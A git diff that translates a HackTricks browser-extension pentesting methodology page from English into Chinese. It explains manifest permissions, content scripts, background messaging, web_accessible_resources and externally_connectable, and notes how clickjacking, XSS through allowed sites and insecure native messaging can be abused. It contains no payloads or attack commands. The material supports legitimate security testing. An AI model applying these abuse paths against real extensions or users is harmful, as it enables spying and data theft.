diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
index 998ebd4e2..db50a5ccc 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -1,280 +1,260 @@
-# Browser Extension Pentesting Methodology
+# 浏览器扩展渗透测试方法论
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-Browser extensions are written in JavaScript and loaded by the browser in the background. It has its [DOM](https://www.w3schools.com/js/js_htmldom.asp) but can interact with other sites' DOMs. This means that it may compromise other sites' confidentiality, integrity, and availability (CIA).
+浏览器扩展是用 JavaScript 编写的，并在后台由浏览器加载。它有自己的 [DOM](https://www.w3schools.com/js/js_htmldom.asp)，但可以与其他网站的 DOM 进行交互。这意味着它可能会危害其他网站的机密性、完整性和可用性（CIA）。
 
-## Main Components
+## 主要组件
 
-Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth.
+扩展布局在可视化时效果最佳，由三个组件组成。让我们深入了解每个组件。
 
 <figure><img src="../../images/image (16) (1) (1).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
 
-### **Content Scripts**
+### **内容脚本**
 
-Each content script has direct access to the DOM of a **single web page** and is thereby exposed to **potentially malicious input**. However, the content script contains no permissions other than the ability to send messages to the extension core.
+每个内容脚本可以直接访问 **单个网页** 的 DOM，因此暴露于 **潜在的恶意输入**。然而，内容脚本除了能够向扩展核心发送消息外，没有其他权限。
 
-### **Extension Core**
+### **扩展核心**
 
-The extension core contains most of the extension privileges/access, but the extension core can only interact with web content via [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) and content scripts. Also, the extension core does not have direct access to the host machine.
+扩展核心包含大部分扩展权限/访问，但扩展核心只能通过 [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) 和内容脚本与网页内容进行交互。此外，扩展核心无法直接访问主机机器。
 
-### **Native Binary**
+### **本地二进制**
 
-The extension allows a native binary that can **access the host machine with the user’s full privileges.** The native binary interacts with the extension core through the standard Netscape Plugin Application Programming Interface ([NPAPI](https://en.wikipedia.org/wiki/NPAPI)) used by Flash and other browser plug-ins.
+扩展允许一个本地二进制文件，可以 **以用户的全部权限访问主机机器。** 本地二进制通过 Flash 和其他浏览器插件使用的标准 Netscape 插件应用程序编程接口 ([NPAPI](https://en.wikipedia.org/wiki/NPAPI)) 与扩展核心进行交互。
 
-### Boundaries
+### 边界
 
 > [!CAUTION]
-> To obtain the user's full privileges, an attacker must convince the extension to pass malicious input from the content script to the extension's core and from the extension's core to the native binary.
+> 为了获得用户的全部权限，攻击者必须说服扩展将恶意输入从内容脚本传递到扩展核心，并从扩展核心传递到本地二进制。
 
-Each component of the extension is separated from each other by **strong protective boundaries**. Each component runs in a **separate operating system process**. Content scripts and extension cores run in **sandbox processes** unavailable to most operating system services.
+扩展的每个组件之间由 **强保护边界** 隔离。每个组件在 **单独的操作系统进程** 中运行。内容脚本和扩展核心在 **沙箱进程** 中运行，这些进程对大多数操作系统服务不可用。
 
-Moreover, content scripts separate from their associated web pages by **running in a separate JavaScript heap**. The content script and web page have **access to the same underlying DOM**, but the two **never exchange JavaScript pointers**, preventing the leaking of JavaScript functionality.
+此外，内容脚本通过 **在单独的 JavaScript 堆中运行** 与其关联的网页分离。内容脚本和网页有 **访问相同的底层 DOM** 的权限，但两者 **从不交换 JavaScript 指针**，防止 JavaScript 功能的泄露。
 
 ## **`manifest.json`**
 
-A Chrome extension is just a ZIP folder with a [.crx file extension](https://www.lifewire.com/crx-file-2620391). The extension's core is the **`manifest.json`** file at the root of the folder, which specifies layout, permissions, and other configuration options.
-
-Example:
+Chrome 扩展只是一个带有 [.crx 文件扩展名](https://www.lifewire.com/crx-file-2620391) 的 ZIP 文件夹。扩展的核心是位于文件夹根目录的 **`manifest.json`** 文件，该文件指定布局、权限和其他配置选项。
 
+示例：
 ```json
 {
-  "manifest_version": 2,
-  "name": "My extension",
-  "version": "1.0",
-  "permissions": ["storage"],
-  "content_scripts": [
-    {
-      "js": ["script.js"],
-      "matches": ["https://example.com/*", "https://www.example.com/*"],
-      "exclude_matches": ["*://*/*business*"]
-    }
-  ],
-  "background": {
-    "scripts": ["background.js"]
-  },
-  "options_ui": {
-    "page": "options.html"
-  }
+"manifest_version": 2,
+"name": "My extension",
+"version": "1.0",
+"permissions": ["storage"],
+"content_scripts": [
+{
+"js": ["script.js"],
+"matches": ["https://example.com/*", "https://www.example.com/*"],
+"exclude_matches": ["*://*/*business*"]
+}
+],
+"background": {
+"scripts": ["background.js"]
+},
+"options_ui": {
+"page": "options.html"
+}
 }
 ```
-
 ### `content_scripts`
 
-Content scripts are **loaded** whenever the user **navigates to a matching page**, in our case any page matching the **`https://example.com/*`** expression and not matching the **`*://*/*/business*`** regex. They execute **like the page’s own scripts** and have arbitrary access to the page’s [Document Object Model (DOM)](https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model).
-
+内容脚本在用户**导航到匹配页面**时**加载**，在我们的例子中，任何匹配**`https://example.com/*`**表达式且不匹配**`*://*/*/business*`**正则表达式的页面。它们**像页面自己的脚本**一样执行，并且可以任意访问页面的[文档对象模型 (DOM)](https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model)。
 ```json
 "content_scripts": [
-    {
-      "js": [
-        "script.js"
-      ],
-      "matches": [
-        "https://example.com/*",
-        "https://www.example.com/*"
-      ],
-      "exclude_matches": ["*://*/*business*"],
-    }
-  ],
+{
+"js": [
+"script.js"
+],
+"matches": [
+"https://example.com/*",
+"https://www.example.com/*"
+],
+"exclude_matches": ["*://*/*business*"],
+}
+],
 ```
+为了包含或排除更多的 URL，还可以使用 **`include_globs`** 和 **`exclude_globs`**。
 
-In order to include or exclude more URLs it's also possible to use **`include_globs`** and **`exclude_globs`**.
-
-This is an example content script which will add an explain button to the page when [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) to retrieve the `message` value from extension’s storage.
-
+这是一个示例内容脚本，当使用 [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) 从扩展的存储中检索 `message` 值时，将向页面添加一个解释按钮。
 ```js
 chrome.storage.local.get("message", (result) => {
-  let div = document.createElement("div")
-  div.innerHTML = result.message + " <button>Explain</button>"
-  div.querySelector("button").addEventListener("click", () => {
-    chrome.runtime.sendMessage("explain")
-  })
-  document.body.appendChild(div)
+let div = document.createElement("div")
+div.innerHTML = result.message + " <button>Explain</button>"
+div.querySelector("button").addEventListener("click", () => {
+chrome.runtime.sendMessage("explain")
+})
+document.body.appendChild(div)
 })
 ```
-
 <figure><img src="../../images/image (23).png" alt=""><figcaption></figcaption></figure>
 
-A message is sent to the extension pages by the content script when this button is clicked, through the utilization of the [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage). This is due to the content script's limitation in direct access to APIs, with `storage` being among the few exceptions. For functionalities beyond these exceptions, messages are sent to extension pages which content scripts can communicate with.
+当点击此按钮时，通过使用 [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage)，内容脚本向扩展页面发送消息。这是由于内容脚本在直接访问API方面的限制，`storage`是少数例外之一。对于超出这些例外的功能，消息被发送到扩展页面，内容脚本可以与之通信。
 
 > [!WARNING]
-> Depending on the browser, the capabilities of the content script may vary slightly. For Chromium-based browsers, the capabilities list is available in the [Chrome Developers documentation](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities), and for Firefox, the [MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis) serves as the primary source.\
-> It is also noteworthy that content scripts have the ability to communicate with background scripts, enabling them to perform actions and relay responses back.
+> 根据浏览器的不同，内容脚本的能力可能会略有不同。对于基于Chromium的浏览器，能力列表可在 [Chrome Developers documentation](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities) 中找到，而对于Firefox，[MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis) 是主要来源。\
+> 还值得注意的是，内容脚本能够与后台脚本进行通信，使其能够执行操作并传递响应。
 
-For viewing and debugging content scripts in Chrome, the Chrome developer tools menu can be accessed from Options > More tools > Developer tools OR by pressing Ctrl + Shift + I.
+要在Chrome中查看和调试内容脚本，可以通过选项 > 更多工具 > 开发者工具访问Chrome开发者工具菜单，或按Ctrl + Shift + I。
 
-Upon the developer tools being displayed, the **Source tab** is to be clicked, followed by the **Content Scripts** tab. This allows for the observation of running content scripts from various extensions and the setting of breakpoints to track the execution flow.
+当开发者工具显示后，点击**源**选项卡，然后点击**内容脚本**选项卡。这允许观察来自各种扩展的运行内容脚本，并设置断点以跟踪执行流程。
 
-### Injected content scripts
+### 注入的内容脚本
 
 > [!TIP]
-> Note that **Content Scripts aren't mandatory** as it's also possible to **dynamically** **inject** scripts and to **programatically inject them** in web pages via **`tabs.executeScript`**. This actually provides more **granular controls**.
+> 请注意，**内容脚本不是强制性的**，因为也可以通过**`tabs.executeScript`** **动态** **注入**脚本并在网页中**以编程方式注入**。这实际上提供了更**细粒度的控制**。
 
-For the programmatic injection of a content script, the extension is required to have [host permissions](https://developer.chrome.com/docs/extensions/reference/permissions) for the page into which the scripts are to be injected. These permissions may be secured either by **requesting them** within the manifest of the extension or on a temporary basis through [**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab).
-
-#### Example activeTab-based extension
+要以编程方式注入内容脚本，扩展需要对要注入脚本的页面具有[主机权限](https://developer.chrome.com/docs/extensions/reference/permissions)。这些权限可以通过在扩展的清单中**请求**它们或通过[**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab)临时获取。
 
+#### 示例基于activeTab的扩展
 ```json:manifest.json
 {
-  "name": "My extension",
-  ...
-  "permissions": [
-    "activeTab",
-    "scripting"
-  ],
-  "background": {
-    "service_worker": "background.js"
-  },
-  "action": {
-    "default_title": "Action Button"
-  }
+"name": "My extension",
+...
+"permissions": [
+"activeTab",
+"scripting"
+],
+"background": {
+"service_worker": "background.js"
+},
+"action": {
+"default_title": "Action Button"
+}
 }
 ```
-
-- **Inject a JS file on click:**
-
+- **点击时注入 JS 文件：**
 ```javascript
 // content-script.js
 document.body.style.backgroundColor = "orange"
 
 //service-worker.js - Inject the JS file
 chrome.action.onClicked.addListener((tab) => {
-  chrome.scripting.executeScript({
-    target: { tabId: tab.id },
-    files: ["content-script.js"],
-  })
+chrome.scripting.executeScript({
+target: { tabId: tab.id },
+files: ["content-script.js"],
+})
 })
 ```
-
-- **Inject a function** on click:
-
+- **在点击时注入一个函数**:
 ```javascript
 //service-worker.js - Inject a function
 function injectedFunction() {
-  document.body.style.backgroundColor = "orange"
+document.body.style.backgroundColor = "orange"
 }
 
 chrome.action.onClicked.addListener((tab) => {
-  chrome.scripting.executeScript({
-    target: { tabId: tab.id },
-    func: injectedFunction,
-  })
+chrome.scripting.executeScript({
+target: { tabId: tab.id },
+func: injectedFunction,
+})
 })
 ```
-
-#### Example with scripting permissions
-
+#### 示例与脚本权限
 ```javascript
 // service-workser.js
 chrome.scripting.registerContentScripts([
-  {
-    id: "test",
-    matches: ["https://*.example.com/*"],
-    excludeMatches: ["*://*/*business*"],
-    js: ["contentScript.js"],
-  },
+{
+id: "test",
+matches: ["https://*.example.com/*"],
+excludeMatches: ["*://*/*business*"],
+js: ["contentScript.js"],
+},
 ])
 
 // Another example
 chrome.tabs.executeScript(tabId, { file: "content_script.js" })
 ```
+为了包含或排除更多的 URL，还可以使用 **`include_globs`** 和 **`exclude_globs`**。
 
-In order to include or exclude more URLs it's also possible to use **`include_globs`** and **`exclude_globs`**.
+### 内容脚本 `run_at`
 
-### Content Scripts `run_at`
+`run_at` 字段控制 **JavaScript 文件何时注入到网页中**。首选和默认值是 `"document_idle"`。
 
-The `run_at` field controls **when JavaScript files are injected into the web page**. The preferred and default value is `"document_idle"`.
+可能的值有：
 
-The possible values are:
-
-- **`document_idle`**: Whenever possible
-- **`document_start`**: After any files from `css`, but before any other DOM is constructed or any other script is run.
-- **`document_end`**: Immediately after the DOM is complete, but before subresources like images and frames have loaded.
-
-#### Via `manifest.json`
+- **`document_idle`**：尽可能地
+- **`document_start`**：在任何 `css` 文件之后，但在构建任何其他 DOM 或运行任何其他脚本之前。
+- **`document_end`**：在 DOM 完成后立即，但在子资源（如图像和框架）加载之前。
 
+#### 通过 `manifest.json`
 ```json
 {
-  "name": "My extension",
-  ...
-  "content_scripts": [
-    {
-      "matches": ["https://*.example.com/*"],
-      "run_at": "document_idle",
-      "js": ["contentScript.js"]
-    }
-  ],
-  ...
+"name": "My extension",
+...
+"content_scripts": [
+{
+"matches": ["https://*.example.com/*"],
+"run_at": "document_idle",
+"js": ["contentScript.js"]
+}
+],
+...
 }
 
 ```
-
-Via **`service-worker.js`**
-
+通过 **`service-worker.js`**
 ```javascript
 chrome.scripting.registerContentScripts([
-  {
-    id: "test",
-    matches: ["https://*.example.com/*"],
-    runAt: "document_idle",
-    js: ["contentScript.js"],
-  },
+{
+id: "test",
+matches: ["https://*.example.com/*"],
+runAt: "document_idle",
+js: ["contentScript.js"],
+},
 ])
 ```
-
 ### `background`
 
-Messages sent by content scripts are received by the **background page**, which serves a central role in coordinating the extension's components. Notably, the background page persists across the extension's lifetime, operating discreetly without direct user interaction. It possesses its own Document Object Model (DOM), enabling complex interactions and state management.
+由内容脚本发送的消息由**背景页面**接收，该页面在协调扩展的组件中发挥着核心作用。值得注意的是，背景页面在扩展的整个生命周期中持续存在，默默运行而无需直接用户交互。它拥有自己的文档对象模型（DOM），能够实现复杂的交互和状态管理。
 
-**Key Points**:
+**关键点**：
 
-- **Background Page Role:** Acts as the nerve center for the extension, ensuring communication and coordination among various parts of the extension.
-- **Persistence:** It's an ever-present entity, invisible to the user but integral to the extension's functionality.
-- **Automatic Generation:** If not explicitly defined, the browser will automatically create a background page. This auto-generated page will include all the background scripts specified in the extension's manifest, ensuring the seamless operation of the extension's background tasks.
+- **背景页面角色：** 作为扩展的神经中枢，确保扩展各部分之间的通信和协调。
+- **持久性：** 它是一个始终存在的实体，对用户不可见，但对扩展的功能至关重要。
+- **自动生成：** 如果未明确定义，浏览器将自动创建一个背景页面。这个自动生成的页面将包含扩展清单中指定的所有背景脚本，确保扩展的后台任务无缝运行。
 
 > [!TIP]
-> The convenience provided by the browser in automatically generating a background page (when not explicitly declared) ensures that all necessary background scripts are integrated and operational, streamlining the extension's setup process.
-
-Example background script:
+> 浏览器在自动生成背景页面（未明确声明时）所提供的便利，确保所有必要的背景脚本都被集成并正常运行，从而简化了扩展的设置过程。
 
+示例背景脚本：
 ```js
 chrome.runtime.onMessage.addListener((request, sender, sendResponse) => {
-  if (request == "explain") {
-    chrome.tabs.create({ url: "https://example.net/explanation" })
-  }
+if (request == "explain") {
+chrome.tabs.create({ url: "https://example.net/explanation" })
+}
 })
 ```
+它使用 [runtime.onMessage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/onMessage) 来监听消息。当接收到 `"explain"` 消息时，它使用 [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) 在新标签页中打开一个页面。
 
-It uses [runtime.onMessage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/onMessage) to listen to messages. When an `"explain"` message is received, it uses [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) to open a page in a new tab.
-
-To debug the background script you could go to the **extension details and inspect the service worker,** this will open the developer tools with the background script:
+要调试后台脚本，您可以进入 **扩展详细信息并检查服务工作者，** 这将打开带有后台脚本的开发者工具：
 
 <figure><img src="https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/browser-extension-pentesting-methodology/broken-reference" alt=""><figcaption></figcaption></figure>
 
-### Options pages and other
+### 选项页面和其他
 
-Browser extensions can contain various kinds of pages:
+浏览器扩展可以包含各种类型的页面：
 
-- **Action pages** are displayed in a **drop-down when the extension ico**n is clicked.
-- Pages that the extension will **load in a new tab**.
-- **Option Pages**: This page displays on top of the extension when clicked. In the previous manifest In my case I was able to access this page in `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` or clicking:
+- **操作页面** 在点击扩展图标时显示在 **下拉菜单中**。
+- 扩展将 **在新标签页中加载的页面**。
+- **选项页面**：此页面在点击时显示在扩展顶部。在之前的清单中，我能够通过 `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` 访问此页面，或点击：
 
 <figure><img src="../../images/image (24).png" alt="" width="375"><figcaption></figcaption></figure>
 
-Note that these pages aren't persistent like background pages as they load dynamically content on necessity. Despite this, they share certain capabilities with the background page:
+请注意，这些页面不像后台页面那样持久，因为它们根据需要动态加载内容。尽管如此，它们与后台页面共享某些功能：
 
-- **Communication with Content Scripts:** Similar to the background page, these pages can receive messages from content scripts, facilitating interaction within the extension.
-- **Access to Extension-Specific APIs:** These pages enjoy comprehensive access to extension-specific APIs, subject to the permissions defined for the extension.
+- **与内容脚本的通信：** 类似于后台页面，这些页面可以接收来自内容脚本的消息，促进扩展内的交互。
+- **访问扩展特定的 API：** 这些页面享有对扩展特定 API 的全面访问，受扩展定义的权限限制。
 
 ### `permissions` & `host_permissions`
 
-**`permissions`** and **`host_permissions`** are entries from the `manifest.json` that will indicate **which permissions** the browser extensions has (storage, location...) and in **which web pages**.
+**`permissions`** 和 **`host_permissions`** 是 `manifest.json` 中的条目，指示 **浏览器扩展具有哪些权限**（存储、位置等）以及 **在哪些网页上**。
 
-As browser extensions can be so **privileged**, a malicious one or one being compromised could allow the attacker **different means to steal sensitive information and spy on the user**.
+由于浏览器扩展可能具有 **特权**，恶意扩展或被攻击的扩展可能允许攻击者 **以不同方式窃取敏感信息并监视用户**。
 
-Check how these settings work and how they could get abused in:
+检查这些设置如何工作以及它们如何被滥用：
 
 {{#ref}}
 browext-permissions-and-host_permissions.md
@@ -282,15 +262,13 @@ browext-permissions-and-host_permissions.md
 
 ### `content_security_policy`
 
-A **content security policy** can be declared also inside the `manifest.json`. If there is one defined, it could be **vulnerable**.
-
-The default setting for browser extension pages is rather restrictive:
+**内容安全策略** 也可以在 `manifest.json` 中声明。如果定义了内容安全策略，它可能是 **脆弱的**。
 
+浏览器扩展页面的默认设置相当严格：
 ```bash
 script-src 'self'; object-src 'self';
 ```
-
-For more info about CSP and potential bypasses check:
+有关CSP和潜在绕过的更多信息，请查看：
 
 {{#ref}}
 ../content-security-policy-csp-bypass/
@@ -298,203 +276,189 @@ For more info about CSP and potential bypasses check:
 
 ### `web_accessible_resources`
 
-in order for a webpage to access a page of a Browser Extension, a `.html` page for example, this page needs to be mentioned in the **`web_accessible_resources`** field of the `manifest.json`.\
-For example:
-
+为了让网页访问浏览器扩展的页面，例如一个`.html`页面，该页面需要在`manifest.json`的**`web_accessible_resources`**字段中提及。\
+例如：
 ```javascript
 {
- ...
- "web_accessible_resources": [
-   {
-     "resources": [ "images/*.png" ],
-     "matches": [ "https://example.com/*" ]
-   },
-   {
-     "resources": [ "fonts/*.woff" ],
-     "matches": [ "https://example.com/*" ]
-   }
- ],
- ...
+...
+"web_accessible_resources": [
+{
+"resources": [ "images/*.png" ],
+"matches": [ "https://example.com/*" ]
+},
+{
+"resources": [ "fonts/*.woff" ],
+"matches": [ "https://example.com/*" ]
+}
+],
+...
 }
 ```
-
-These pages are accesible in URL like:
-
+这些页面可以通过以下 URL 访问：
 ```
 chrome-extension://<extension-id>/message.html
 ```
-
-In public extensions the **extension-id is accesible**:
+在公共扩展中，**extension-id 是可访问的**：
 
 <figure><img src="../../images/image (1194).png" alt="" width="375"><figcaption></figcaption></figure>
 
-Although, if the `manifest.json` parameter **`use_dynamic_url`** is used, this **id can be dynamic**.
+不过，如果使用了 `manifest.json` 参数 **`use_dynamic_url`**，则该 **id 可能是动态的**。
 
 > [!TIP]
-> Note that even if a page is mentioned here, it might be **protected against ClickJacking** thanks to the **Content Security Policy**. So you also need to check it (frame-ancestors section) before confirming a ClickJacking attack is possible.
+> 请注意，即使此处提到某个页面，它也可能由于 **Content Security Policy** 而 **受到 ClickJacking 保护**。因此，在确认 ClickJacking 攻击是否可能之前，您还需要检查它（frame-ancestors 部分）。
 
-Being allowed to access these pages make these pages **potentially vulnerable ClickJacking**:
+允许访问这些页面使这些页面 **可能容易受到 ClickJacking 攻击**：
 
 {{#ref}}
 browext-clickjacking.md
 {{#endref}}
 
 > [!TIP]
-> Allowing these pages to be loaded only by the extension and not by random URLs could prevent ClickJacking attacks.
+> 仅允许这些页面由扩展加载，而不是由随机 URL 加载，可以防止 ClickJacking 攻击。
 
 > [!CAUTION]
-> Note that the pages from **`web_accessible_resources`** and other pages of the extension are also capable of **contacting background scripts**. So if one of these pages is vulnerable to **XSS** it could open a bigger vulnerability.
+> 请注意，**`web_accessible_resources`** 中的页面和扩展的其他页面也能够 **联系后台脚本**。因此，如果这些页面中的一个容易受到 **XSS** 攻击，可能会导致更大的漏洞。
 >
-> Moreover, note that you can only open pages indicated in **`web_accessible_resources`** inside iframes, but from a new tab it's possible to access any page in the extension knowing the extension ID. Therefore, if an XSS is found abusing same parameters, it could be abused even if the page isn't configured in **`web_accessible_resources`**.
+> 此外，请注意，您只能在 iframe 中打开 **`web_accessible_resources`** 中指示的页面，但从新标签页可以访问扩展中的任何页面，只需知道扩展 ID。因此，如果发现 XSS 利用相同参数，即使页面未在 **`web_accessible_resources`** 中配置，也可能被利用。
 
 ### `externally_connectable`
 
-A per the [**docs**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable), The `"externally_connectable"` manifest property declares **which extensions and web pages can connect** to your extension via [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) and [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage).
-
-- If the **`externally_connectable`** key is **not** declared in your extension's manifest or it's declared as **`"ids": ["*"]`**, **all extensions can connect, but no web pages can connect**.
-- If **specific IDs are specified**, like in `"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`, **only those applications** can connect.
-- If **matches** are specified, those web apps will be able to connect:
+根据 [**docs**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable)，`"externally_connectable"` 清单属性声明 **哪些扩展和网页可以通过** [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) 和 [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) 连接到您的扩展。
 
+- 如果在扩展的清单中 **未** 声明 **`externally_connectable`** 键，或者声明为 **`"ids": ["*"]`**，则 **所有扩展都可以连接，但没有网页可以连接**。
+- 如果指定了 **特定 ID**，如 `"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`，则 **只有这些应用程序** 可以连接。
+- 如果指定了 **matches**，则这些网页应用程序将能够连接：
 ```json
 "matches": [
-      "https://*.google.com/*",
-      "*://*.chromium.org/*",
+"https://*.google.com/*",
+"*://*.chromium.org/*",
 ```
+- 如果指定为空：**`"externally_connectable": {}`**，则没有应用程序或网页能够连接。
 
-- If it's specified as empty: **`"externally_connectable": {}`**, no app or web will be able to connect.
-
-The **less extensions and URLs** indicated here, the **smaller the attack surface** will be.
+这里指示的**扩展和 URL**越少，**攻击面**就会越小。
 
 > [!CAUTION]
-> If a web page **vulnerable to XSS or takeover** is indicated in **`externally_connectable`**, an attacker will be able to **send messages directly to the background script**, completely bypassing the Content Script and its CSP.
+> 如果网页在**`externally_connectable`**中被指示为**易受 XSS 或接管攻击**，攻击者将能够**直接向后台脚本发送消息**，完全绕过内容脚本及其 CSP。
 >
-> Therefore, this is a **very powerful bypass**.
+> 因此，这是一个**非常强大的绕过**。
 >
-> Moreover, if the client installs a rouge extension, even if it isn't allowed to communicate with the vulnerable extension, it could inject **XSS data in an allowed web page** or abuse **`WebRequest`** or **`DeclarativeNetRequest`** APIs to manipulate requests on a targeted domain altering a page's request for a **JavaScript file**. (Note that CSP on the targeted page could prevent these attacks). This idea comes [**from this writeup**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability).
+> 此外，如果客户端安装了一个恶意扩展，即使它不被允许与易受攻击的扩展通信，它也可能在一个允许的网页中注入**XSS 数据**，或滥用**`WebRequest`**或**`DeclarativeNetRequest`** API 来操纵目标域上的请求，改变页面对**JavaScript 文件**的请求。（请注意，目标页面上的 CSP 可能会阻止这些攻击）。这个想法来自[**这篇文章**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability)。
 
-## Communication summary
+## 通信总结
 
-### Extension <--> WebApp
+### 扩展 <--> WebApp
 
-To communicate between the content script and the web page post messages are usually used. Therefore, in the web application you will usually find calls to the function **`window.postMessage`** and in the content script listeners like **`window.addEventListener`**. Note however, that the extension could also **communicate with the web application sending a Post Message** (and therefore the web should expect it) or just make the web load a new script.
+在内容脚本和网页之间，通常使用后续消息进行通信。因此，在网页应用程序中，您通常会找到对函数**`window.postMessage`**的调用，而在内容脚本中则有像**`window.addEventListener`**这样的监听器。然而，请注意，扩展也可以**通过发送 Post Message 与网页应用程序通信**（因此网页应该预期此情况），或者仅使网页加载一个新脚本。
 
-### Inside the extension
+### 在扩展内部
 
-Usually the function **`chrome.runtime.sendMessage`** is used to send a message inside the extension (usually handled by the `background` script) and in order to receive and handle it a listener is declared calling **`chrome.runtime.onMessage.addListener`**.
+通常使用函数**`chrome.runtime.sendMessage`**在扩展内部发送消息（通常由`background`脚本处理），为了接收和处理它，声明一个监听器调用**`chrome.runtime.onMessage.addListener`**。
 
-It's also possible to use **`chrome.runtime.connect()`** to have a persistent connection instead of sending single messages, it's possible to use it to **send** and **receive** **messages** like in the following example:
+也可以使用**`chrome.runtime.connect()`**来建立持久连接，而不是发送单个消息，可以用它来**发送**和**接收****消息**，如下例所示：
 
 <details>
 
-<summary><code>chrome.runtime.connect()</code> example</summary>
-
+<summary><code>chrome.runtime.connect()</code> 示例</summary>
 ```javascript
 var port = chrome.runtime.connect()
 
 // Listen for messages from the web page
 window.addEventListener(
-  "message",
-  (event) => {
-    // Only accept messages from the same window
-    if (event.source !== window) {
-      return
-    }
+"message",
+(event) => {
+// Only accept messages from the same window
+if (event.source !== window) {
+return
+}
 
-    // Check if the message type is "FROM_PAGE"
-    if (event.data.type && event.data.type === "FROM_PAGE") {
-      console.log("Content script received: " + event.data.text)
-      // Forward the message to the background script
-      port.postMessage({ type: "FROM_PAGE", text: event.data.text })
-    }
-  },
-  false
+// Check if the message type is "FROM_PAGE"
+if (event.data.type && event.data.type === "FROM_PAGE") {
+console.log("Content script received: " + event.data.text)
+// Forward the message to the background script
+port.postMessage({ type: "FROM_PAGE", text: event.data.text })
+}
+},
+false
 )
 
 // Listen for messages from the background script
 port.onMessage.addListener(function (msg) {
-  console.log("Content script received message from background script:", msg)
-  // Handle the response message from the background script
+console.log("Content script received message from background script:", msg)
+// Handle the response message from the background script
 })
 ```
-
 </details>
 
-It's also possible to send messages from a background script to a content script located in a specific tab calling **`chrome.tabs.sendMessage`** where you will need to indicated the **ID of the tab** to send the message to.
+也可以从后台脚本向位于特定标签页中的内容脚本发送消息，调用 **`chrome.tabs.sendMessage`**，在此需要指明要发送消息的 **标签页 ID**。
 
-### From allowed `externally_connectable` to the extension
-
-**Web apps and external browser extensions allowed** in the `externally_connectable` configuration can send requests using :
+### 从允许的 `externally_connectable` 到扩展
 
+**在 `externally_connectable` 配置中允许的 Web 应用和外部浏览器扩展** 可以使用以下方式发送请求：
 ```javascript
 chrome.runtime.sendMessage(extensionId, ...
 ```
+在需要提及**扩展 ID**的地方。
 
-Where it's needed to mention the **extension ID**.
-
-### Native Messaging
-
-It's possible for the background scripts to communicate with binaries inside the system, which might be **prone to critical vulnerabilities such as RCEs** if this communication is not properly secured. [More on this later](./#native-messaging).
+### 本地消息传递
 
+后台脚本可以与系统内的二进制文件进行通信，如果这种通信没有得到妥善保护，可能会**容易受到诸如 RCE 等关键漏洞的影响**。[稍后会详细介绍](./#native-messaging)。
 ```javascript
 chrome.runtime.sendNativeMessage(
-  "com.my_company.my_application",
-  { text: "Hello" },
-  function (response) {
-    console.log("Received " + response)
-  }
+"com.my_company.my_application",
+{ text: "Hello" },
+function (response) {
+console.log("Received " + response)
+}
 )
 ```
+## Web **↔︎** 内容脚本通信
 
-## Web **↔︎** Content Script Communication
-
-The environments where **content scripts** operate and where the host pages exist are **separated** from one another, ensuring **isolation**. Despite this isolation, both have the ability to interact with the page's **Document Object Model (DOM)**, a shared resource. For the host page to engage in communication with the **content script**, or indirectly with the extension through the content script, it is required to utilize the **DOM** that is accessible by both parties as the communication channel.
-
-### Post Messages
+**内容脚本**操作的环境与主页面存在的环境是**分开的**，确保了**隔离**。尽管存在这种隔离，双方都能够与页面的**文档对象模型 (DOM)** 进行交互，这是一个共享资源。为了使主页面能够与**内容脚本**进行通信，或通过内容脚本间接与扩展进行通信，必须利用双方都可以访问的**DOM**作为通信通道。
 
+### 后续消息
 ```javascript:content-script.js
 // This is like "chrome.runtime.sendMessage" but to maintain the connection
 var port = chrome.runtime.connect()
 
 window.addEventListener(
-  "message",
-  (event) => {
-    // We only accept messages from ourselves
-    if (event.source !== window) {
-      return
-    }
+"message",
+(event) => {
+// We only accept messages from ourselves
+if (event.source !== window) {
+return
+}
 
